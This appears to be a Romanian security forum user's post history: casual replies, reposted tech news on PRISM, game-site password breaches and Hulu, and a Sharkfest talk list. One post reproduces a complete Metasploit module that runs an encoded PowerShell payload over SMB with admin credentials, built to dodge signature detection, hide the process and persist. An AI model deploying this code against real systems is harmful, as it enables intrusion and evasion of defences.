-
Posts
1773 -
Joined
-
Last visited
-
Days Won
6
Everything posted by Matt
-
Era doar un fel de a spune , nu te speria.
-
Pe ramura pulii. Aveti topic special pentru Facultate , acuma daca ati copiat toti la bac inseamna ca trebuie sa postati ca vreti la facultate de INFORMATICA ? Nu asa ajungeti "hascheri". //
-
http://www.youtube.com/watch?feature=player_embedded&v=-iIm7_tncPs
-
Description : This Metasploit module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the -encodedcommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. Since executing shellcode in .NET requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the process entirely. Author : RageLtMan, Royce Davis Source : Microsoft Windows Authenticated Powershell Command Execution ? Packet Storm Code : # -*- coding: binary -*- ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Psexec include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', 'Description' => %q{ This module uses a valid administrator username and password to execute a powershell payload using a similar technique to the "psexec" utility provided by SysInternals. The payload is encoded in base64 and executed from the commandline using the -encodedcommand flag. Using this method, the payload is never written to disk, and given that each payload is unique, is less prone to signature based detection. Since executing shellcode in .NET requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided to execute the payload in a while loop in order to maintain a form of persistence. In the event of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection. In order to avoid interactive process notifications for the current user, the psh payload has been reduced in size and wrapped in a powershell invocation which hides the process entirely. }, 'Author' => [ 'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module 'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders ], 'License' => MSF_LICENSE, 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 8192, 'DisableNops' => true, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 01 1999', 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'], [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] ] )) end def exploit command = cmd_psh_payload(payload.encoded) if datastore['PERSIST'] and not datastore['DisablePayloadHandler'] print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PERSIST option.") end if datastore['RUN_WOW64'] and target_arch.first == "x86_64" fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled") end # Try and authenticate with given credentials if connect begin smb_login rescue StandardError => autherror disconnect fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command print_status("#{peer} - Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error disconnect fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") end end end def peer return "#{rhost}:#{rport}" end end
-
eBay has launched a new marketplace service which will allow users to purchase devices from 3D printing companies. Known as eBay Exact, the service will team up with 3D printing hardware vendors and facilities to allow users the ability to configure and order objects from 3D printing merchants. Through the Exact service, users will be able to view and order objects which are then designed to specification and printed by the merchant at a 3D printing facility. The items can be ordered, printed and shipped to customers within 7-14 days. The launch of the service will include eBay and PayPal support and will offer 3D printed objects from vendors MakerBot, Sculpteo and Hot Pop Factory. Users will be able to purchase 3D printed objects crafted from metal, wood and plastic materials. “Shoppers today not only want to buy items anytime, anywhere through mobile devices, but they also want to be able to personalize their purchases,” said eBay vice president of innovation and new ventures Steve Yankovich. “eBay Exact brings these two desires into one shopping experience.” The eBay Exact app is currently being offered for iOS devices through the App Store. The company did not provide word on when client applications for other platforms could be released. Fueled by both advancements in technology and an increase in public interest, 3D printing has moved from a specialised market to a mainstream technology in recent years. A number of vendors have begun to target hobbyist users with personal printing devices, while a groiwing number of industrial processes and markets have embraced the technology as well. Sursa V3.co.uk
-
The studios behind the Hulu video streaming service said that they are no longer looking to sell off the company. In a joint announcement, executives with 20th Century Fox, NBC Universal and Disney said that they have decided to pull the company off the markets and instead focus on raising new capital to help grow the company. The firms, which had been said to be entertaining offers to sell off the video service, will now instead seek to pump some $750m into Hulu in order to further grow its brand and extend its reach in the streaming video market. “We believe the best path forward for Hulu is a meaningful recapitalization that will further accelerate its growth under the current ownership structure,” said 20th Century Fox president and chief operating officer Chase Carey. “We had meaningful conversations with a number of potential partners and buyers, each with impressive plans and offers to match, but with 21st Century Fox and Disney fully aligned in our collective vision and goals for the business, we decided to continue to empower the Hulu team, in this fashion, to continue the incredible momentum they've built over the last few years.” Launched in 2008, Hulu had sought to provide a network-backed alternative video streaming service that would help to steer users away from illegal downloading. While the service has amassed an impressive video library and now offers a premium service, Hulu encountered roadblocks when in January of this year then-chief executive Jason Kilar resigned his position with the company. Among the firms rumoured to be considering a purchase of Hulu was resurgent web content broker Yahoo. Sursa V3.co.uk
-
Da.Fiecare facultate , alt dosar , and money $$
-
4. Unele categorii au regulament intern. Verific? dac? exist? un regulament sticky înainte de a posta într-o anumite categorie. În special categoriile "CERERI"(minim 10 posturi de CALITATE), "AJUTOR"(minim 10 posturi de CALITATE) sau "Bloguri ?i Bloggeri"(minim 50 posturi CALITATE).
-
Vezi daca te ajuta asta : http://public.cranfield.ac.uk/c5354/teaching/dip/opencv/manual/opencv_tutorials242.pdf
-
Hahaha.
-
Noi "zice-m" parerea.
-
Uploaded by samiTM.
-
Bai ce Basescu guverneaza?
-
Ce treaba are Basescu? De unde stii ca sunt brazilieni? / OFF : Da-i in pula mea de saraci , n-au bani sa manance o banana si sunt hackeri.
-
FTP-uri cu date personale DB-uri si alte chestii (ROMANESTI)
Matt replied to h05th's topic in Programe utile
6. Publicarea datelor personale, sau tentative de acest gen, ale oric?rui individ, duce la ban permanent. -
SOFTWARE HOUSE Microsoft has responded to reports about PRISM surveillance, and tried to distance itself from suggestions that it is an open book to intelligence agencies. The firm has released a statement following a report in the Guardian newspaper that accused it of handing over "blanket access" to its customers' data. The Guardian report said that Microsoft threw open its doors to the US intelligence services, and it claimed that files provided by Edward Snowden have shown the extent of access Microsoft gave to the US National Security Agency (NSA), Federal Bureau of Investigation (FBI) and Central Intelligence Agency (CIA). The Guardian story accused Microsoft of giving the NSA blanket access to Outlook.com and Hotmail as well as Skydrive and Skype. Material that the NSA extracted across these properties is "routinely shared" with the FBI and the CIA, according to the newspaper. Microsoft is not the only company accused of collusion with US intelligence agencies, but it has been portrayed as being rather zealous in its involvement. The Guardian reported that Microsoft boasted about its data delivery capabilities in Skype and its tripled PRISM data collection operations. Microsoft disputed this, claiming that it is a principled company and takes its customers' privacy seriously. "We have clear principles which guide the response across our entire company to government demands for customer information for both law enforcement and national security issues," it said. "First, we take our commitments to our customers and to compliance with applicable law very seriously, so we provide customer data only in response to legal processes. Second, our compliance team examines all demands very closely, and we reject them if we believe they aren't valid. Third, we only ever comply with orders about specific accounts or identifiers, and we would not respond to the kind of blanket orders discussed in the press over the past few weeks, as the volumes documented in our most recent disclosure clearly illustrate." In case we hadn't worked it out, Microsoft said that it definitely does not give any government direct access to its users' activities, explaining, "To be clear, Microsoft does not provide any government with blanket or direct access to SkyDrive, Outlook.com, Skype or any Microsoft product." However, it added that there are times when product changes and legal obligations collide, adding that it will serve information based on law enforcement requests. "Finally when we upgrade or update products legal obligations may in some circumstances require that we maintain the ability to provide information in response to a law enforcement or national security request," it added "There are aspects of this debate that we wish we were able to discuss more freely. That's why we've argued for additional transparency that would help everyone understand and debate these important issues." Sursa Theinquirer.net
-
GAMES PUBLISHER Konami has asked all users of its website to change their passwords after finding over 35,000 unauthorised logins to the service. Konami has requested that all users of its Konami ID portal website change their passwords after uncovering a security breach that led to a large number of unauthorised accesses. The firm said that over a period of three weeks 35,252 accounts were accessed through just under four million attempts. Konami took the commendable decision to release details about the security breach. The firm said that during the period 13 June through 7 July, 3,945,927 login attempts had been made, of which 35,252 were successful. The figures were calculated after the firm detected a large number of login errors on 8 July. The games publisher said that the customer information that might have been compromised included users' names, addresses, dates of birth, telephone numbers and email addresses. Konami said no changes of customers' information or unauthorised use of paid services have been detected. Konami said it has strengthened security and "raised its monitoring level". The firm added that user IDs and passwords that were involved in unauthorised logins can no longer be used. Konami added that the IDs and passwords used for unauthorised logins had been leaked from an external service. The firm did not say what the external service was or whether it still has access to Konami's databases. Konami joins Ubisoft, Codemasters and Bohemia Interactive in having suffered security breaches that led to the firms asking customers to change their passwords. Sursa TheInquirer.net
-
http://www.theinquirer.net/IMG/164/244164/converge-combine-prism-270x167.jpg?1357216429 UNITED STATES CIVIL RIGHTS GROUP the American Civil Liberties Union has expressed concern that the persecution of whistleblower Edward Snowden could break the international asylum system. In a letter posted on its website, the ACLU said that the prospect of sanctions raised by the US government are in danger of ruining a system that offers solace to the outspoken. ACLU Human Rights Programme director Jamil Dakwar and ACLU senior staff attorney Chandra Bhatnagar posted their concerns in reaction to reports that the US government is pressuring countries that might have offered Snowden safe harbour. "In the case of Mr Snowden, the United States has interfered with his right to seek asylum in two significant ways. First, the US revoked Mr. Snowden's passport. While this action does not render Mr. Snowden 'stateless' (because he is still a U.S. citizen), it does make it extremely difficult for him to travel or seek asylum, especially in countries that require asylees to be present in their territory at the time of the request," they wrote. "Second, while the United States is within its rights to seek Mr Snowden's extradition to face charges in the United States, diplomatic and law enforcement efforts to extradite him must be consistent with international law. It appears that US efforts have prevented Mr Snowden from receiving fair and impartial consideration of his application for asylum in many of the countries to which he reportedly applied." So heavyhanded has the response to Snowden been, noted the ACLU, that a plane carrying Bolivian president Evo Morales was effectively forced to land and then searched for the whistleblower. "US actions (including whatever role the United States played in the incident involving President Morales' plane) have arguably strengthened Mr Snowden's claims for asylum based on political persecution," they added. "In addition to infringing on Mr Snowden's right to asylum, US actions also create the risk of providing cover for other countries to crack down on whistleblowers and deny asylum to individuals who have exposed illegal activity or human rights violations. That's a very dangerous precedent to set." Sursa TheInquirer.net
-
GAMES PUBLISHER Bohemia Interactive is requiring its website and forum users to reset their passwords after uncovering unauthorised access to parts of its website. Bohemia Interactive is best known for its ARMA military simulator titles. It announced yesterday that it had uncovered unauthorised access to its web servers, and is forcing all users to change their passwords despite saying that no credit card information was stored in any of its databases. According to Bohemia Interactive the unauthorised access led to the downloading of a database that stored usernames, email addresses and encrypted passwords. The firm said that the database did not include any credit card information and the passwords were encrypted, claiming this makes it "very unlikely that anything nefarious can be done with this information", though that is unlikely to calm users' fears. The games publisher said, "As a precaution we are resetting the passwords of all users which means you will be unable to log into any of our websites/forums until your password is changed." It is forcing all users to go to a "recover password" website that emails new passwords to existing account holders. Users should also change their passwords at any other website(s) where they used the same password. Bohemia Interactive isn't the first game publisher to face unauthorised access in recent months, with Ubisoft having urged 58 million users to change their passwords earlier this month, while Codemasters also announced it had been a hacking victim. Sursa TheInquirer.net
-
Ba esti terminat ? Ai 5 posturi dintre care 4 formate din 2 double-posturi si toate pentru cerere de filelist.
-
1.WIRESHARK NETWORK FORENSICS Description This session was recorded at Sharkfest 2013, UC Berkeley, CA Join Laura Chappell in this session as she examines a slew of malicious traffic, customizes Wireshark to detect these problems faster, and extracts relevant information using command-line tools. You'll learn how Wireshark can be used as network forensic software and how it helped detect various successful/unsuccessful breaches in a recent project. Laura Chappell is the founder of Chappell University and the co-founder of Wireshark University with Gerald Combs. Long-time, well-known Wireshark evangelist and author of the best-selling "Wireshark Network Analysis: Official Wireshark Certified Network Analyst Study Guide" and numerous other industry books, Ms. Chappell began her career as a network analyst in 1991 when Novell acquired the LANalyzer product. She has worked with numerous analyzer products since then but, in 1999, decided to focus her analysis time working exclusively with the open source Ethereal (now known as Wireshark) network and protocol analysis tool. Laura developed the Wireshark Certified Network Analyst Program and manages the Wireshark University Authorized Training Partner Program and the Wireshark University Authorized Instructor Program. 2.USERS ASK THE EXPERTS Description Come to this session if you want the chance to experience a lively exchange of information between the Wireshark developer and user communities. Moderated by long-time Wireshark User and Enthusiast Chris Bidwell, you will have the opportunity to ask questions of Gerald Combs, the creator of the Ethereal and Wireshark open source projects, and core developers actively engaged in the product and help influence the development direction of the Wireshark project. Chris Bidwell is a Network Engineer for an IT services company in the UK implementing low-latency IT systems for use in investment management. Chris is also a veteran Wireshark user and lively advocate for the open source project. 3.UNDERSTANDING ENCRYPTION SERVICES USING WIRESHARK Description This session was delivered at Sharkfest 2013 - UC Berkeley, CA Many people equate cryptography with confidentiality, but today we use cryptographic algorithms to validate authenticity, integrity and non-repudiation of information as well. In this session Larry will use Wireshark to sniff a number of SSL handshakes, using different browsers, to explain how algorithms are negotiated and keys exchanged. The hardest part about encryption, key management will also be discussed including a description of PKI standards, using Wireshark to illustrate certificate signing and revocation using both Certificate Revocation Lists (CRL) and the Online Certificate Status Protocol (OCSP). Larry started his IT career in 1984 as a technician for MicroAge, cutting his teeth on IBM PC-based networks and Netware 86. After four years in the 90s working for CGI/IBM as a senior network consultant designing and supporting IPX, SNA and TCP/IP-based network solutions, Larry founded InterNetwork Defense, an information security training and consulting company, where he currently teaches CEH, CISM and CISSP training classes. Larry is also the co-author of the cryptography section for the CEH official study guide. 4. ATTACK TRENDS AND TECHNIQUES Description This session was recorded at Sharkfest 2013 - UC Berkeley, CA The bad guys just keep getting better! They're constantly changing their tactics and inventing new techniques to cause you harm, damage your data, and make your resources unavailable. Why do they do this? What motivates someone to—let's call it what it is—commit computer-related crimes? How have they changed and improved? What kinds of attacks are popular now and why are they so effective? What might we expect to see in the future? We'll help you understand the latest in attacker trends and techniques, so that you can plan appropriately and implement effective processes and technologies to mitigate threats. Steve Riley is a Technical Director in the Office of the CTO at Riverbed Technology. His specialties include the performance and security aspects of enterprise and cloud computing. Steve has a long career of public speaking, having participated in hundreds of events around the world. He is co-author of Protect Your Windows Network, contributed a chapter to Auditing Cloud Computing, has published numerous articles, and conducted technical reviews of several data networking and telecommunications books. At Riverbed, Steve concentrates on high-performance architectures that span multiple clouds, public and private; advises field teams and customers about secure deployments; and contemplates the future of networking. Before Steve joined Riverbed, he was the cloud security strategist at Amazon Web Services and a security consultant and advisor at Microsoft; in both capacities, he developed patterns and practices for secure deployments and operations. Steve is a member of the Kubuntu Team (which maintains Ubuntu's KDE-flavored distribution) and is a global moderator of its community forum. Besides lurking in the Internet's dark alleys and secret passages, he enjoys freely sharing his opinions about the intersection of technology and culture. 5.TRACE FILE SANITIZATION Description This session was recorded at Sharkfest 2013 - UC Berkeley, CA PCAPng is the new default capture file format, and it comes with new challenges when trying to remove sensitive information. Most tools do not support the format yet, and converting pcapng files to pcap to do it isn't helping either. We will take a look at the tools available and compare their functionality. 6.Inside the TCP Handshake Description All TCP streams begin with the handshake, yet so often its power to determine fault in low throughput, connection failures, and hideous user experience streams is unrecognized. If you can capture the handshake in Wireshark, troubleshooting time is greatly minimized. This session will cover the handshakes from the single required option to the complex option combinations, and how they affect the subsequent conversation. Both live capturing and trace files will be used in the session so bring your laptops! 7.Keynote: Musings Of An Early Networker Description At Sharkfest 2013, Mr. Seifert discussed in his keynote session the original DEC-Intel-Xerox Ethernet development and the evolution of network standards over the past 30 years. From early battles between Ring, Star, and Bus topologies through the market war among Ethernet, Token Ring, and ATM, he provides insight into why some technologies succeed and others fail. As a test of that insight, he revisits his 2001 proclamation of "Stupid Network Ideas" to see where he was right and where he wasn't. Recorded at Sharkfest 2013, UC Berkeley, CA. 8.Deep Dive Packet Analysis Session
-
- 1
-
Oracle has tightened the links between several parts of its middleware suite to save infrastructure administrators time, and increase data availability and portability across large data center infrastrucutres. The upgrades to key components of Oracle's "Cloud Application Foundation" were announced by the company on Thursday and see Ellison & Co tie the WebLogic application server closer to the "Coherence" database caching technology, which has gained further hooks into the Oracle database 12c. "There's a number of new integration points and capabilities that are in the release," Oracle vice president of product management Mike Lehmann, tells The Register. "There's a common install patching, upgrade, provisioning model and lifecycle model for Coherence and WebLogic together." The WebLogic management framework is now consistent across all Fusion middleware, and it can now be installed and patched using the same process as Coherence, whereas previously it used legacy BEA installation. Meanwhile, Coherence has been natively integrated into WebLogic as a "first class" Container, which Oracle is calling Managed Coherence Servers. This makes it easier to install and manage the technology from within WebLogic. By closely tying the two software packages together Oracle is hoping to keep customers within its walled garden of software by giving them features that come about through combination. For instance, Coherence – whose closest non-Oracle equivalent is Gemfire from Pivotal – can now be paired with Oracle's GoldenGate technology to add distributed caching consistency into it. "We can always ensure that all the applications using Coherence can have up to date data within the cache," Lehmann says. Naturally, Oracle insists in press releases that the best foundation for the software is Oracle's ExaLogic hardware. WebLogic Server has gained a simplified Java Messaging Service, and full integration for Oracle Database 12c's much-vaunted multi-tenant "pluggable" database feature. Longtime Oracle followers may remember the numerous tirades the company has embarked on regarding the failures of multi-tenant databases, but Lehmann insists this was due to how existing multi-tenant tech was being implemented. "When people have been describing multi-tenancy they have been in a shared database mixing different tenants in the same database, and Oracle has had a belief that's not a good model, that's not a model our customers would generally accept," he said. "What we've introduced in 12c... is what is called a pluggable database which gives you data isolation in each of the pluggable databases." ® Sursa TheRegister.co.uk